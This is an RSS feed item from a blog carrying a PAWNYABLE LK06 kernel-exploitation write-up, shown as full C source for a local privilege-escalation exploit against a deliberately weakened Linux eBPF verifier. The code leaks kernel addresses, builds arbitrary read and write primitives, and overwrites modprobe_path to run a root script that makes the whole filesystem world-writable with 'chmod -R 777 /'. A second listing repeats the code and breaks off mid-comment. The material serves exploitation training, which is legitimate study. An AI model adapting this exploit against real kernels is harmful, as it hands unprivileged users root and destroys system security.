<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Brahman on Uniguri&#39;s Blog</title>
    <link>/tags/brahman/</link>
    <description>Recent content in Brahman on Uniguri&#39;s Blog</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <lastBuildDate>Wed, 22 Jan 2025 12:31:57 +0000</lastBuildDate><atom:link href="/tags/brahman/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>PAWNYABLE LK06: Brahman</title>
      <link>/posts/kernel/pawnyable/pawnyable_lk06/</link>
      <pubDate>Wed, 22 Jan 2025 12:31:57 +0000</pubDate>
      
      <guid>/posts/kernel/pawnyable/pawnyable_lk06/</guid>
      <description>&lt;hr&gt;
&lt;h2 id=&#34;lk06-brahman&#34;&gt;LK06: Brahman&lt;/h2&gt;
&lt;h3 id=&#34;exploit-using-adjust_ptr_min_max_vals&#34;&gt;Exploit using adjust_ptr_min_max_vals&lt;/h3&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;149628537&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;149628537&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;exploit.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handle the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // This call sets the min and max of r1 to the known immediate.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&amp;amp;val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  write(socks[1], &amp;#34;Hello&amp;#34;, 5);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // This call sets the min and max of r1 to the known immediate.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // This call sets the min and max of r1 to the known immediate.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx, &amp;amp;bpf_map_elem = 0x%016lx\n&amp;#34;, bpf_map_addr,
         bpf_map_addr + 0x110);

  const uint64_t kernel_base = aar64(bpf_map_addr) - BPF_MAP_OPS_OFFSET;
  printf(&amp;#34;[+] kernel_base: 0x%016lx\n&amp;#34;, kernel_base);

  const char* new_modprobe = &amp;#34;/tmp/evil.sh&amp;#34;;
  const size_t new_modprobe_len = strlen(new_modprobe);
  printf(&amp;#34;[*] Overwrite modprobe to %s\n&amp;#34;, new_modprobe);
  for (size_t i = 0; i &amp;lt; new_modprobe_len; i += 8) {
    aaw64(kernel_base + MODPROB_OFFSET + i, *(uint64_t*)(new_modprobe + i));
  }
  {
    int fd = open(&amp;#34;/proc/sys/kernel/modprobe&amp;#34;, O_RDONLY);
    if (fd &amp;lt; 0) {
      fatal(&amp;#34;open(/proc/sys/kernel/modprobe)&amp;#34;);
    }

    char modprobe[0x100];
    read(fd, modprobe, sizeof(modprobe));
    if (strncmp(modprobe, new_modprobe, new_modprobe_len)) {
      printf(&amp;#34;[*] new modprobe: %s\n&amp;#34;, modprobe);
      puts(&amp;#34;[-] Failed to overwrite modprobe&amp;#34;);
      return -1;
    }
    puts(&amp;#34;[+] Successfully overwritten modprobe&amp;#34;);
  }

  puts(&amp;#34;[+] Get root&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;#!/bin/sh\nchmod -R 777 /&amp;#39; &amp;gt; /tmp/evil.sh&amp;#34;);
  system(&amp;#34;chmod +x /tmp/evil.sh&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;\xde\xad\xbe\xef&amp;#39; &amp;gt; /tmp/pwn&amp;#34;);
  system(&amp;#34;chmod +x /tmp/pwn&amp;#34;);
  system(&amp;#34;/tmp/pwn&amp;#34;);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h3 id=&#34;leaks&#34;&gt;Leaks&lt;/h3&gt;
&lt;h4 id=&#34;leak-addr-of-struct-bpf_map-using-adjust_ptr_min_max_vals&#34;&gt;Leak addr of &lt;code&gt;struct bpf_map&lt;/code&gt; using &lt;code&gt;adjust_ptr_min_max_vals&lt;/code&gt;&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;546928317&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;546928317&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_bpf_map_using_adjust_ptr_min_max_vals.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handle the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
